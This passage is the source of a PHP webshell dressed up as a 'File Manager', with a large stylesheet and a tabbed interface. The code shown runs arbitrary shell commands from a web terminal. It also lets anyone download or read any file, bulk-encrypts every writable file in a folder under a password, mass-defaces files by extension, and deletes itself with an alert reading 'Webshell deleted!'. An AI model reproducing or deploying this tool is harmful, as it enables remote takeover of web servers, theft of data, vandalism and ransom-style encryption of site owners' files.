                        $_SESSION['error'] = 'Encryption failed! Check permissions or file may already be encrypted.';
                    }
                }
            }
            break;
        case 'decryptfile':
            if (isset($_POST['f'], $_POST['pass']) && file_exists($_POST['f'])) {
                $pass = trim($_POST['pass']);
                if (!empty($pass)) {
                    if (decryptFile($_POST['f'], $pass)) {
                        $_SESSION['message'] = 'File decrypted successfully!';
                    } else {
                        $_SESSION['error'] = 'Decryption failed! Wrong password or file not encrypted.';
                    }
                }
            }
            break;
        case 'encryptfolder':
            if (isset($_POST['epass'])) {
                $pass = trim($_POST['epass']);
                $files = listFiles($path);
                $encrypted = 0;
                foreach ($files as $f) {
                    if (!$f['is_dir'] && is_writable($f['path']) && !isEncrypted($f['path'])) {
                        if (encryptFile($f['path'], $pass)) {
                            $encrypted++;
                        }
                    }
                }
                $_SESSION['message'] = $encrypted . ' files encrypted!';
            }
            break;
        case 'decryptfolder':
            if (isset($_POST['dpass'])) {
                $pass = trim($_POST['dpass']);
                $files = listFiles($path);
                $decrypted = 0;
                foreach ($files as $f) {
                    if (!$f['is_dir'] && is_writable($f['path']) && isEncrypted($f['path'])) {
                        if (decryptFile($f['path'], $pass)) {
                            $decrypted++;
                        }
                    }
                }
                $_SESSION['message'] = $decrypted . ' files decrypted!';
            }
            break;
        case 'massdeface':
            if (isset($_POST['extensions']) && !empty($_POST['extensions'])) {
                $count = massDeface($path, $_POST['method'], $_POST['code'] ?? '', $_POST['extensions']);
                $_SESSION['message'] = 'Mass deface completed on ' . $count . ' files!';
            }
            break;
        case 'selfdestruct':
            if (file_exists(__FILE__) && is_writable(__FILE__)) {
                if (unlink(__FILE__)) {
                    session_destroy();
                    die('<script>alert("Webshell deleted!"); window.close();</script>');
                }
            }
            break;
        case 'exec':
            if (!isset($_SESSION['terminal_history'])) {
                $_SESSION['terminal_history'] = array();
            }
            $_SESSION['terminal_output'] = exe($_POST['cmd'], $path);
            $_SESSION['last_command'] = $_POST['cmd'];
            array_unshift($_SESSION['terminal_history'], $_POST['cmd']);
            if (count($_SESSION['terminal_history']) > 50) {
                array_pop($_SESSION['terminal_history']);
            }
            $action = 'terminal';
            break;
    }
    if ($_POST['a'] != 'exec') {
        header('Location: ?a=' . urlencode($action) . '&p=' . urlencode($path));
        exit();
    }
}

if ($action == 'download' && isset($_GET['f']) && file_exists($_GET['f']) && is_file($_GET['f'])) {
    $file = $_GET['f'];
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . basename($file) . '"');
    header('Expires: 0');
    header('Cache-Control: must-revalidate');
    header('Pragma: public');
    header('Content-Length: ' . filesize($file));
    readfile($file);
    exit;
}

if ($action == 'getfile' && isset($_GET['f']) && file_exists($_GET['f']) && is_file($_GET['f']) && is_readable($_GET['f'])) {
    $file = $_GET['f'];
    $content = file_get_contents($file);
    if ($content !== false) {
        header('Content-Type: text/plain; charset=utf-8');
        echo $content;
    } else {
        http_response_code(500);
        echo "Error reading file";
    }
    exit;
}

if ($action == 'search' && isset($_GET['q'])) {
    $search_query = $_GET['q'];
    $search_results = searchFiles($path, $search_query);
}

echo '<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, user-scalable=yes">
    <title>File Manager</title>
    <style>
    * {
        margin: 0;
        padding: 0;
        box-sizing: border-box;
        -webkit-tap-highlight-color: transparent;
        touch-action: manipulation;
    }
    :root {
        --primary: #00ff88;
        --primary-dark: #00cc66;
        --primary-light: rgba(0, 255, 136, 0.1);
        --bg: #0a0a0f;
        --bg-light: #121218;
        --bg-lighter: #1a1a22;
        --text: #e0e0ff;
        --text-secondary: #a0a0c0;
        --danger: #ff4444;
        --warning: #ffaa44;
        --success: #00ff88;
        --border: rgba(0, 255, 136, 0.3);
        --shadow: 0 10px 30px rgba(0, 0, 0, 0.5);
        --radius: 12px;
        --radius-sm: 8px;
        --radius-xs: 6px;
        --font-size-xs: 12px;
        --font-size-sm: 13px;
        --font-size-md: 14px;
        --font-size-lg: 15px;
        --font-size-xl: 16px;
        --font-size-xxl: 18px;
    }
    body {
        background: var(--bg);
        color: var(--text);
        font-family: "Segoe UI", -apple-system, BlinkMacSystemFont, "SF Pro Text", Roboto, sans-serif;
        line-height: 1.4;
        font-size: var(--font-size-md);
        min-height: 100vh;
        overflow-x: hidden;
    }
    .app-container {
        display: flex;
        flex-direction: column;
        min-height: 100vh;
        max-width: 100%;
        margin: 0 auto;
    }
    .app-header {
        background: rgba(10, 10, 15, 0.95);
        backdrop-filter: blur(20px);
        border-bottom: 1px solid var(--border);
        padding: 10px 12px;
        position: sticky;
        top: 0;
        z-index: 1000;
        display: flex;
        flex-direction: column;
        gap: 8px;
    }
    .header-row {
        display: flex;
        align-items: center;
        justify-content: space-between;
        gap: 8px;
        width: 100%;
        flex-wrap: wrap;
    }
    .header-title {
        color: var(--primary);
        font-size: var(--font-size-lg);
        font-weight: 700;
        display: flex;
        align-items: center;
        gap: 6px;
        white-space: nowrap;
        flex-shrink: 0;
    }
    .current-path {
        background: var(--bg-light);
        border: 1px solid var(--border);
        border-radius: var(--radius-xs);
        padding: 6px 10px;
        font-family: "SF Mono", "Cascadia Code", monospace;
        font-size: var(--font-size-xs);
        color: var(--text-secondary);
        overflow: hidden;
        text-overflow: ellipsis;
        white-space: nowrap;
        flex: 1;
        min-width: 0;
        line-height: 1.3;
    }
    .header-actions {
        display: flex;
        gap: 6px;
        flex-wrap: nowrap;
        justify-content: flex-start;
        overflow-x: auto;
        padding-bottom: 2px;
        -webkit-overflow-scrolling: touch;
        scrollbar-width: none;
        width: 100%;
    }
    .header-actions::-webkit-scrollbar {
        display: none;
    }
    .quick-btn {
        padding: 7px 10px;
        background: var(--bg-lighter);
        color: var(--text);
        border: 1px solid var(--border);
        border-radius: var(--radius-xs);
        font-size: var(--font-size-xs);
        cursor: pointer;
        transition: all 0.2s ease;
        white-space: nowrap;
        flex-shrink: 0;
        display: flex;
        align-items: center;
        justify-content: center;
        gap: 4px;
        min-height: 32px;
    }
    .quick-btn:hover {
        background: rgba(0, 255, 136, 0.1);
        color: var(--primary);
    }
    .tabs-container {
        display: flex;
        overflow-x: auto;
        padding: 8px 10px;
        background: var(--bg-light);
        border-bottom: 1px solid var(--border);
        gap: 6px;
        -webkit-overflow-scrolling: touch;
        scrollbar-width: none;
        position: sticky;
        top: 0;
        z-index: 999;
    }
    .tabs-container::-webkit-scrollbar {
        display: none;
    }
    .tab-btn {
        padding: 9px 14px;
        background: var(--bg-lighter);
        color: var(--text-secondary);
        border: 1px solid transparent;
        border-radius: var(--radius-sm);
        font-size: var(--font-size-sm);
        font-weight: 600;
        cursor: pointer;
        white-space: nowrap;
        transition: all 0.3s ease;
        display: flex;
        align-items: center;
        justify-content: center;
        gap: 6px;
        min-height: 38px;
        flex-shrink: 0;
    }
    .tab-btn:hover {
        background: rgba(0, 255, 136, 0.1);
        color: var(--primary);
        transform: translateY(-1px);
    }
    .tab-btn.active {
        background: rgba(0, 255, 136, 0.2);
        color: var(--primary);
        border-color: var(--primary);
        box-shadow: 0 4px 12px rgba(0, 255, 136, 0.2);
    }
    .tab-btn.danger {
        background: rgba(255, 68, 68, 0.1);
        color: var(--danger);
    }
    .tab-btn.danger:hover {
        background: rgba(255, 68, 68, 0.2);
    }
    .main-content {
        flex: 1;
        padding: 12px;
        width: 100%;
        overflow-y: auto;
    }
    .tab-content {
        display: none;
        animation: fadeIn 0.3s ease;
    }
    .tab-content.active {
        display: block;
    }
    .path-nav {
        background: var(--bg-light);
        border-radius: var(--radius);
        padding: 12px;
        margin-bottom: 12px;
        border: 1px solid var(--border);
        display: flex;
        flex-direction: column;
        gap: 10px;
    }
    .path-form {
        display: flex;
        gap: 8px;
        width: 100%;
        flex-direction: column;
    }
    .path-input {
        flex: 1;
        padding: 10px 12px;
        background: var(--bg);
        border: 2px solid var(--border);
        border-radius: var(--radius-xs);
        color: var(--primary);
        font-size: var(--font-size-sm);
        font-family: monospace;
        width: 100%;
        min-height: 40px;
        line-height: 1.3;
    }
    .path-input:focus {
        outline: none;
        border-color: var(--primary);
        box-shadow: 0 0 0 3px rgba(0, 255, 136, 0.2);
    }
    .path-btn {
        padding: 10px 16px;
        background: var(--primary);
        color: #000;
        border: none;
        border-radius: var(--radius-xs);
        font-weight: 700;
        font-size: var(--font-size-sm);
        cursor: pointer;
        white-space: nowrap;
        transition: all 0.3s ease;
        min-height: 40px;
        width: 100%;
        line-height: 1.3;
    }
    .path-btn:hover {
        background: var(--primary-dark);
        transform: translateY(-1px);
    }
    .quick-actions {
        display: flex;
        gap: 6px;
        flex-wrap: wrap;
    }
    .quick-actions .quick-btn {
        padding: 8px 10px;
        font-size: var(--font-size-xs);
        min-height: 32px;
    }
    .search-box {
        background: var(--bg-light);
        border-radius: var(--radius);
        padding: 12px;
        margin-bottom: 12px;
        border: 1px solid var(--border);
    }
    .search-form {
        display: flex;
        gap: 8px;
        margin-bottom: 10px;
        flex-direction: column;
    }
    .search-input {
        flex: 1;
        padding: 10px 12px;
        background: var(--bg);
        border: 2px solid var(--border);
        border-radius: var(--radius-xs);
        color: var(--text);
        font-size: var(--font-size-sm);
        min-height: 40px;
        line-height: 1.3;
    }
    .search-input:focus {
        outline: none;
        border-color: var(--primary);
        box-shadow: 0 0 0 3px rgba(0, 255, 136, 0.2);
    }
    .search-results {
        max-height: 400px;
        overflow-y: auto;
        margin-top: 12px;
    }
    .search-suggestions {
        background: var(--bg-lighter);
        border-radius: var(--radius-xs);
        margin-top: 6px;
        padding: 6px;
        border: 1px solid var(--border);
        max-height: 200px;
        overflow-y: auto;
        display: none;
        position: absolute;
        z-index: 1000;
        width: calc(100% - 24px);
        left: 12px;
        right: 12px;
    }
    .suggestion-item {
        padding: 8px 10px;
        cursor: pointer;
        border-radius: var(--radius-xs);
        transition: all 0.2s ease;
        font-size: var(--font-size-sm);
        line-height: 1.3;
    }
    .suggestion-item:hover {
        background: rgba(0, 255, 136, 0.1);
        color: var(--primary);
    }
    .upload-box {
        background: var(--bg-light);
        border-radius: var(--radius);
        padding: 12px;
        margin-bottom: 12px;
        border: 1px solid var(--border);
    }
    .section-title {
        color: var(--primary);
        font-size: var(--font-size-lg);
        font-weight: 700;
        margin-bottom: 12px;
        display: flex;
        align-items: center;
        gap: 6px;
        line-height: 1.3;
    }
    .create-forms {
        display: grid;
        grid-template-columns: repeat(auto-fit, minmax(250px, 1fr));
        gap: 12px;
        margin-bottom: 12px;
    }
    .create-form {
        background: var(--bg-light);
        border-radius: var(--radius);
        padding: 12px;
        border: 1px solid var(--border);
    }
    .form-input {
        width: 100%;
        padding: 10px 12px;
        background: var(--bg);
        border: 2px solid var(--border);
        border-radius: var(--radius-xs);
        color: var(--text);
        font-size: var(--font-size-sm);
        margin-bottom: 10px;
        transition: all 0.3s ease;
        min-height: 40px;
        line-height: 1.3;
    }
    .form-input:focus {
        outline: none;
        border-color: var(--primary);
        box-shadow: 0 0 0 3px rgba(0, 255, 136, 0.2);
    }
    .btn-primary {
        width: 100%;
        padding: 11px;
        background: linear-gradient(135deg, var(--primary) 0%, var(--primary-dark) 100%);
        color: #000;
        border: none;
        border-radius: var(--radius-xs);
        font-size: var(--font-size-sm);
        font-weight: 700;
        cursor: pointer;
        transition: all 0.3s ease;
        display: flex;
        align-items: center;
        justify-content: center;
        gap: 6px;
        min-height: 40px;
        line-height: 1.3;
    }
    .btn-primary:hover {
        transform: translateY(-1px);
        box-shadow: 0 6px 15px rgba(0, 255, 136, 0.3);
    }
    .files-container {
        background: var(--bg-light);
        border-radius: var(--radius);
        padding: 12px;
        border: 1px solid var(--border);
    }
    .files-header {
        display: flex;
        justify-content: space-between;
        align-items: center;
        margin-bottom: 12px;
        flex-wrap: wrap;
        gap: 8px;
    }
    .files-count {
        color: var(--text-secondary);
        font-size: var(--font-size-xs);
        line-height: 1.3;
    }
    .batch-controls {
        display: flex;
        align-items: center;
        gap: 8px;
        padding: 8px 10px;
        background: rgba(0, 255, 136, 0.05);
        border: 1px solid rgba(0, 255, 136, 0.2);
        border-radius: var(--radius-xs);
        margin-bottom: 10px;
        flex-wrap: wrap;
        display: none;
    }
    .batch-checkbox {
        width: 16px;
        height: 16px;
        accent-color: var(--primary);
        cursor: pointer;
        flex-shrink: 0;
    }
    .batch-label {
        font-size: var(--font-size-sm);
        color: var(--text-secondary);
        white-space: nowrap;
        line-height: 1.3;
    }
    .batch-actions {
        display: flex;
        gap: 6px;
        flex-wrap: wrap;
        width: 100%;
        justify-content: flex-start;
    }
    .batch-btn {
        padding: 7px 10px;
        background: rgba(0, 255, 136, 0.1);
        color: var(--primary);
        border: 1px solid rgba(0, 255, 136, 0.3);
        border-radius: var(--radius-xs);
        font-size: var(--font-size-xs);
        font-weight: 600;
        cursor: pointer;
        transition: all 0.2s ease;
        white-space: nowrap;
        flex: 1;
        min-width: 0;
        text-align: center;
        line-height: 1.3;
        min-height: 32px;
    }
    .batch-btn:hover {
        background: rgba(0, 255, 136, 0.2);
    }
    .batch-btn.danger {
        background: rgba(255, 68, 68, 0.1);
        color: var(--danger);
        border-color: rgba(255, 68, 68, 0.3);
    }
    .batch-btn.danger:hover {
        background: rgba(255, 68, 68, 0.2);
    }
    .file-list {
        display: flex;
        flex-direction: column;
        gap: 8px;
    }
    .file-item {
        background: var(--bg-lighter);
        border-radius: var(--radius-xs);
        padding: 10px;
        border: 1px solid transparent;
        transition: all 0.3s ease;
        display: flex;
        flex-wrap: wrap;
        position: relative;
        align-items: flex-start;
    }
    .file-item .file-details {
        display: flex;
        flex-direction: row;
        flex-wrap: wrap;
        gap: 8px;
        width: 100%;
        margin-top: 4px;
        align-items: center;
    }
    .file-item:hover {
        border-color: var(--primary);
        background: rgba(0, 255, 136, 0.05);
    }
    .file-checkbox {
        width: 16px;
        height: 16px;
        accent-color: var(--primary);
        cursor: pointer;
        flex-shrink: 0;
        margin-top: 2px;
    }
    .file-icon {
        font-size: 18px;
        width: 26px;
        text-align: center;
        flex-shrink: 0;
        margin-top: 2px;
        line-height: 1.3;
    }
    .file-info {
        flex: 1;
        min-width: 0;
        overflow: hidden;
        margin-right: 8px;
    }
    .file-name {
        font-weight: 600;
        font-size: var(--font-size-sm);
        margin-bottom: 3px;
        color: var(--text);
        word-break: break-word;
        overflow-wrap: break-word;
        line-height: 1.3;
    }
    .file-details {
        font-size: var(--font-size-xs);
        color: var(--text-secondary);
        display: flex;
        flex-direction: row;
        gap: 8px;
        flex-wrap: wrap;
        align-items: center;
        line-height: 1.3;
    }
    .file-detail {
        display: flex;
        align-items: center;
        gap: 3px;
        white-space: nowrap;
        line-height: 1.3;
    }
    .file-actions {
        display: flex;
        gap: 4px;
        flex-wrap: wrap;
        width: 100%;
        margin-top: 8px;
        padding-top: 8px;
        border-top: 1px solid rgba(255, 255, 255, 0.1);
        justify-content: flex-start;
    }
    .file-btn {
        padding: 6px 8px;
        background: rgba(0, 255, 136, 0.1);
        color: var(--primary);
        border: 1px solid var(--border);
        border-radius: var(--radius-xs);
        font-size: var(--font-size-xs);
        font-weight: 600;
        cursor: pointer;
        transition: all 0.2s ease;
        white-space: nowrap;
        display: flex;
        align-items: center;
        justify-content: center;
        gap: 3px;
        min-height: 30px;
        line-height: 1.2;
        flex: 1;
        min-width: 60px;
        max-width: 120px;
    }
    .file-btn:hover {
        background: rgba(0, 255, 136, 0.2);
    }
    .file-btn.danger {
        background: rgba(255, 68, 68, 0.1);
        color: var(--danger);
        border-color: rgba(255, 68, 68, 0.3);
    }
    .file-btn.danger:hover {
        background: rgba(255, 68, 68, 0.2);
    }
    .terminal-container {
        background: #000;
        border-radius: var(--radius);
        padding: 0;
        overflow: hidden;
        border: 1px solid var(--primary);
        margin-bottom: 12px;
        height: 70vh;
        min-height: 400px;
        max-height: 600px;
        display: flex;
        flex-direction: column;
    }
    .terminal-header {
        background: var(--primary);
        color: #000;
        padding: 10px 12px;
        font-weight: 700;
        font-size: var(--font-size-sm);
        display: flex;
        align-items: center;
        justify-content: space-between;
        flex-wrap: wrap;
        gap: 6px;
        flex-shrink: 0;
        line-height: 1.3;
    }
    .terminal-body {
        flex: 1;
        display: flex;
        flex-direction: column;
        padding: 0;
        background: #000;
        min-height: 0;
    }
    .terminal-output {
        flex: 1;
        background: #000;
        color: var(--primary);
        padding: 12px;
        font-family: "SF Mono", "Cascadia Code", monospace;
        font-size: var(--font-size-sm);
        line-height: 1.3;
        white-space: pre-wrap;
        word-break: break-word;
        overflow-y: auto;
        overflow-x: auto;
        min-height: 0;
        -webkit-overflow-scrolling: touch;
        tab-size: 4;
    }
    .terminal-input-container {
        display: flex;
        padding: 10px;
        background: #111;
        border-top: 1px solid #222;
        flex-shrink: 0;
        align-items: center;
        min-height: 48px;
    }
    .terminal-prompt {
        color: var(--primary);
        font-family: "SF Mono", monospace;
        padding: 8px 10px;
        background: #000;
        border: none;
        font-size: var(--font-size-sm);
        white-space: nowrap;
        flex-shrink: 0;
        line-height: 1.3;
    }
    .terminal-input {
        flex: 1;
        background: transparent;
        border: none;
        color: var(--primary);
        font-family: "SF Mono", monospace;
        font-size: var(--font-size-sm);
        padding: 8px 10px;
        outline: none;
        min-width: 0;
        min-height: 32px;
        -webkit-appearance: none;
        appearance: none;
        line-height: 1.3;
    }
    .terminal-history {
        position: absolute;
        background: #111;
        border: 1px solid var(--border);
        border-radius: var(--radius-xs);
        max-height: 150px;
        overflow-y: auto;
        display: none;
        z-index: 1000;
        width: calc(100% - 20px);
        left: 10px;
        bottom: 58px;
        -webkit-overflow-scrolling: touch;
    }
    .history-item {
        padding: 8px 10px;
        cursor: pointer;
        border-bottom: 1px solid #222;
        font-size: var(--font-size-sm);
        font-family: monospace;
        line-height: 1.3;
    }
    .history-item:hover {
        background: rgba(0, 255, 136, 0.1);
    }
    .deface-box {
        background: var(--bg-light);
        border-radius: var(--radius);
        padding: 12px;
        margin-bottom: 12px;
        border: 1px solid var(--border);
    }
    .deface-method {
        display: flex;
        gap: 8px;
        margin-bottom: 12px;
        flex-direction: column;
    }
    .method-btn {
        padding: 10px 14px;
        background: var(--bg-lighter);
        color: var(--text);
        border: 1px solid var(--border);
        border-radius: var(--radius-xs);
        cursor: pointer;
        transition: all 0.3s ease;
        text-align: center;
        width: 100%;
        line-height: 1.3;
        min-height: 40px;
    }
    .method-btn.active {
        background: rgba(255, 68, 68, 0.1);
        color: var(--danger);
        border-color: var(--danger);
    }
    .deface-section {
        display: none;
    }
    .deface-section.active {
        display: block;
        animation: fadeIn 0.3s ease;
    }
    .modal {
        display: none;
        position: fixed;
        top: 0;
        left: 0;
        width: 100%;
        height: 100%;
        background: rgba(0, 0, 0, 0.95);
        z-index: 9999;
        padding: 10px;
        overflow-y: auto;
        -webkit-overflow-scrolling: touch;
    }
    .modal-content {
        background: var(--bg-light);
        margin: 15px auto;
        max-width: 100%;
        border-radius: var(--radius);
        border: 2px solid var(--primary);
        overflow: hidden;
        width: 100%;
    }
    .modal-header {
        background: var(--primary);
        color: #000;
        padding: 12px;
        font-weight: 700;
        font-size: var(--font-size-lg);
        display: flex;
        justify-content: space-between;
        align-items: center;
        flex-wrap: wrap;
        gap: 8px;
        line-height: 1.3;
    }
    .modal-body {
        padding: 12px;
    }
    .modal-textarea {
        width: 100%;
        height: 60vh;
        min-height: 300px;
        max-height: 500px;
        background: #000;
        color: var(--primary);
        border: 2px solid var(--border);
        border-radius: var(--radius-xs);
        padding: 12px;
        font-family: "SF Mono", monospace;
        font-size: var(--font-size-sm);
        resize: vertical;
        white-space: pre;
        tab-size: 4;
        line-height: 1.3;
        -webkit-overflow-scrolling: touch;
    }
    .modal-actions {
        display: flex;
        gap: 8px;
        justify-content: flex-end;
        margin-top: 15px;
        padding-top: 15px;
        border-top: 1px solid var(--border);
        flex-wrap: wrap;
    }
    .encrypt-modal {
        background: var(--bg-light);
        border-radius: var(--radius);
        padding: 15px;
        max-width: 100%;
        margin: 15px auto;
        border: 2px solid var(--primary);
        width: 100%;
    }
    .encrypt-input {
        width: 100%;
        padding: 11px 13px;
        background: var(--bg);
        border: 2px solid var(--border);
        border-radius: var(--radius-xs);
        color: var(--text);
        font-size: var(--font-size-sm);
        margin: 12px 0;
        min-height: 40px;
        line-height: 1.3;
    }
    .message {
        padding: 10px 12px;
        border-radius: var(--radius-xs);
        margin-bottom: 12px;
        font-weight: 600;
        display: flex;
        align-items: center;
        gap: 6px;
        animation: slideIn 0.3s ease;
        font-size: var(--font-size-sm);
        line-height: 1.3;
    }
    .message.success {
        background: rgba(0, 255, 136, 0.1);
        color: var(--success);
        border: 1px solid rgba(0, 255, 136, 0.3);
    }
    .message.error {
        background: rgba(255, 68, 68, 0.1);
        color: var(--danger);
        border: 1px solid rgba(255, 68, 68, 0.3);
    }
    /* DESKTOP VIEW - 768px pataas */
    @media (min-width: 768px) {
        :root {
            --font-size-xs: 12px;
            --font-size-sm: 13px;
            --font-size-md: 14px;
            --font-size-lg: 15px;
            --font-size-xl: 16px;
            --font-size-xxl: 18px;
        }
        .app-header {
            padding: 12px 15px;
            gap: 10px;
        }
        .header-title {
            font-size: var(--font-size-xl);
        }
        .current-path {
            font-size: var(--font-size-sm);
            padding: 8px 12px;
        }
        .quick-btn {
            padding: 8px 12px;
            font-size: var(--font-size-sm);
            min-height: 34px;
        }
        .header-actions {
            gap: 8px;
            flex-wrap: nowrap;
        }
        .tabs-container {
            padding: 10px 15px;
            gap: 8px;
        }
        .tab-btn {
            padding: 10px 16px;
            font-size: var(--font-size-md);
            min-height: 40px;
        }
        .main-content {
            padding: 15px;
        }
        .path-nav {
            padding: 15px;
            margin-bottom: 15px;
            gap: 12px;
        }
        .path-form {
            flex-direction: row;
        }
        .path-input {
            padding: 11px 14px;
            font-size: var(--font-size-md);
            min-height: 42px;
        }
        .path-btn {
            padding: 11px 18px;
            font-size: var(--font-size-md);
            min-height: 42px;
            width: auto;
        }
        .quick-actions .quick-btn {
            padding: 8px 12px;
            font-size: var(--font-size-sm);
            min-height: 34px;
        }
        .search-box {
            padding: 15px;
            margin-bottom: 15px;
        }
        .search-form {
            flex-direction: row;
            margin-bottom: 12px;
        }
        .search-input {
            padding: 11px 14px;
            font-size: var(--font-size-md);
            min-height: 42px;
        }
        .section-title {
            font-size: var(--font-size-xl);
            margin-bottom: 15px;
            gap: 8px;
        }
        .create-forms {
            gap: 15px;
            margin-bottom: 15px;
        }
        .create-form {
            padding: 15px;
        }
        .form-input {
            padding: 11px 14px;
            font-size: var(--font-size-md);
            margin-bottom: 12px;
            min-height: 42px;
        }
        .btn-primary {
            padding: 12px;
            font-size: var(--font-size-md);
            min-height: 42px;
        }
        .files-container {
            padding: 15px;
        }
        .files-header {
            margin-bottom: 15px;
            gap: 10px;
        }
        .batch-controls {
            padding: 10px 12px;
            margin-bottom: 12px;
            flex-direction: row;
            justify-content: space-between;
        }
        .batch-actions {
            width: auto;
            justify-content: flex-end;
        }
        .batch-btn {
            padding: 8px 12px;
            font-size: var(--font-size-sm);
            min-height: 34px;
            flex: none;
        }
        .file-list {
            gap: 10px;
        }
        .file-item {
            padding: 12px;
            flex-wrap: nowrap;
            align-items: center;
        }
        .file-item .file-details {
            flex-direction: row;
            flex-wrap: nowrap;
            width: auto;
            margin-top: 0;
            margin-left: 15px;
            gap: 15px;
        }
        .file-checkbox {
            width: 18px;
            height: 18px;
            margin-top: 0;
        }
        .file-icon {
            font-size: 20px;
            width: 30px;
            margin-top: 0;
        }
        .file-info {
            flex: 1;
            min-width: 150px;
            max-width: 300px;
            margin-right: 20px;
        }
        .file-name {
            font-size: var(--font-size-md);
            margin-bottom: 4px;
        }
        .file-details {
            font-size: var(--font-size-sm);
            gap: 15px;
        }
        .file-detail {
            gap: 4px;
        }
        .file-actions {
            width: auto;
            margin-top: 0;
            padding-top: 0;
            border-top: none;
            justify-content: flex-end;
            flex: none;
            display: flex;
            gap: 6px;
            margin-left: 15px;
        }
        .file-btn {
            padding: 8px 12px;
            font-size: var(--font-size-sm);
            min-height: 34px;
            flex: none;
            min-width: 70px;
            max-width: none;
        }
        .modal-content {
            max-width: 800px;
            margin: 20px auto;
        }
        .modal-header {
            padding: 15px;
            font-size: var(--font-size-xl);
        }
        .modal-body {
            padding: 15px;
        }
        .modal-textarea {
            padding: 15px;
            font-size: var(--font-size-md);
        }
        .modal-actions {
            margin-top: 20px;
            padding-top: 20px;
            gap: 10px;
        }
        .encrypt-modal {
            max-width: 500px;
            padding: 20px;
            margin: 20px auto;
        }
        .encrypt-input {
            padding: 12px 15px;
            margin: 15px 0;
            min-height: 42px;
        }
        .message {
            padding: 12px 15px;
            margin-bottom: 15px;
            font-size: var(--font-size-md);
            gap: 8px;
        }
        .deface-box {
            padding: 15px;
            margin-bottom: 15px;
        }
        .deface-method {
            flex-direction: row;
            margin-bottom: 15px;
        }
        .method-btn {
            padding: 12px 16px;
            width: auto;
            min-height: 42px;
        }
    }
    /* LARGE DESKTOP - 1024px pataas */
    @media (min-width: 1024px) {
        :root {
            --font-size-xs: 13px;
            --font-size-sm: 14px;
            --font-size-md: 15px;
            --font-size-lg: 16px;
            --font-size-xl: 18px;
            --font-size-xxl: 20px;
        }
        .terminal-container {
            height: 600px;
        }
        .modal-content {
            max-width: 900px;
        }
        .file-info {
            max-width: 400px;
        }
        .file-details {
            gap: 20px;
        }
    }
    /* EXTRA SMALL MOBILE - 360px pababa */
    @media (max-width: 360px) {
        :root {
            --font-size-xs: 11px;
            --font-size-sm: 12px;
            --font-size-md: 13px;
            --font-size-lg: 14px;
            --font-size-xl: 15px;
        }
        .file-btn {
            min-width: 55px;
            padding: 5px 6px;
            font-size: 10px;
        }
        .file-detail {
            font-size: 10px;
        }
        .file-icon {
            font-size: 16px;
            width: 22px;
        }
        .file-name {
            font-size: var(--font-size-xs);
        }
    }
    @keyframes fadeIn {
        from { opacity: 0; transform: translateY(10px); }
        to { opacity: 1; transform: translateY(0); }
    }
    @keyframes slideIn {
        from { opacity: 0; transform: translateX(-20px); }
        to { opacity: 1; transform: translateX(0); }
    }
    .hidden {
        display: none !important;
    }
    .loading {
        opacity: 0.7;
        pointer-events: none;
        position: relative;
    }
    .loading::after {
        content: "";
        position: absolute;
        top: 50%;
        left: 50%;
        width: 20px;
        height: 20px;
        border: 3px solid var(--primary);
        border-radius: 50%;
        border-top-color: transparent;
        animation: spin 1s linear infinite;
        margin-top: -10px;
        margin-left: -10px;
    }
    @keyframes spin {
        to { transform: rotate(360deg); }
    }
    ::-webkit-scrollbar {
        width: 6px;
        height: 6px;
    }
    ::-webkit-scrollbar-track {
        background: var(--bg-light);
    }
    ::-webkit-scrollbar-thumb {
        background: var(--primary);
        border-radius: 3px;
    }
    ::-webkit-scrollbar-thumb:hover {
        background: var(--primary-dark);
    }
    input[type="file"] {
        color: var(--text);
        background: var(--bg);
        border: 2px solid var(--border);
        border-radius: var(--radius-xs);
        padding: 8px;
        width: 100%;
        font-size: var(--font-size-sm);
    }
    input[type="file"]::file-selector-button {
        background: var(--primary);
        color: #000;
        border: none;
        padding: 7px 10px;
        border-radius: var(--radius-xs);
        font-weight: 600;
        cursor: pointer;
        margin-right: 8px;
        font-size: var(--font-size-sm);
    }
    textarea {
        font-size: var(--font-size-sm) !important;
        line-height: 1.4 !important;
        padding: 10px !important;
    }
    select {
        font-size: var(--font-size-sm);
        padding: 10px;
        background: var(--bg);
        color: var(--text);
        border: 2px solid var(--border);
        border-radius: var(--radius-xs);
        min-height: 40px;
    }
    </style>
</head>
<body>
    <div class="app-container">
        <div class="app-header">
            <div class="header-row">
                <div class="header-title">File Manager</div>
                <div class="current-path" title="' . htmlspecialchars($path) . '">📁 ' . htmlspecialchars($path) . '</div>
            </div>
            <div class="header-actions">
                <button class="quick-btn" onclick="refreshCurrentTab()">🔄 Refresh</button>
                <button class="quick-btn" onclick="showTab(\'files\')">📁 Files</button>
                <form method="post" style="display:inline">
                    <input type="hidden" name="logout" value="1">
                    <button type="submit" class="quick-btn">🚪 Logout</button>
                </form>
            </div>
        </div>
        <div class="tabs-container">
            <button class="tab-btn ' . ($action == 'index' ? 'active' : '') . '" onclick="showTab(\'files\')" id="tabFiles">
                📁 File Manager
            </button>
            <button class="tab-btn ' . ($action == 'terminal' ? 'active' : '') . '" onclick="showTab(\'terminal\')" id="tabTerminal">
                💻 Terminal
            </button>
            <button class="tab-btn ' . ($action == 'deface' ? 'active' : '') . '" onclick="showTab(\'deface\')" id="tabDeface">
                🎯 Mass Deface
            </button>
            <button class="tab-btn danger" onclick="selfDestruct()" id="tabDestruct">
                💥 Self Destruct
            </button>
        </div>
        <div class="main-content">';

if (isset($_SESSION['message'])) {
    echo '<div class="message success">✅ ' . htmlspecialchars($_SESSION['message']) . '</div>';
    unset($_SESSION['message']);
}
if (isset($_SESSION['error'])) {
    echo '<div class="message error">❌ ' . htmlspecialchars($_SESSION['error']) . '</div>';
    unset($_SESSION['error']);
}

echo '<div id="files" class="tab-content ' . ($action == 'index' ? 'active' : '') . '">
    <div class="path-nav">
        <form method="get" class="path-form">
            <input type="hidden" name="a" value="index">
            <input type="text" name="p" class="path-input" value="' . htmlspecialchars($path) . '" placeholder="Enter path..." autocomplete="off">
            <button type="submit" class="path-btn">Go</button>
        </form>
        <div class="quick-actions">
            <button class="quick-btn" onclick="location.href=\'?a=index&p=' . urlencode(dirname($path)) . '\'">
                ⬆️ Parent
            </button>
            <button class="quick-btn" onclick="location.href=\'?a=index&p=' . urlencode(__DIR__) . '\'">
                🏠 Home
            </button>
            <button class="quick-btn" onclick="showEncryptFolder()">
                🔐 Encrypt All
            </button>
            <button class="quick-btn" onclick="showDecryptFolder()">
                🔓 Decrypt All
            </button>
        </div>
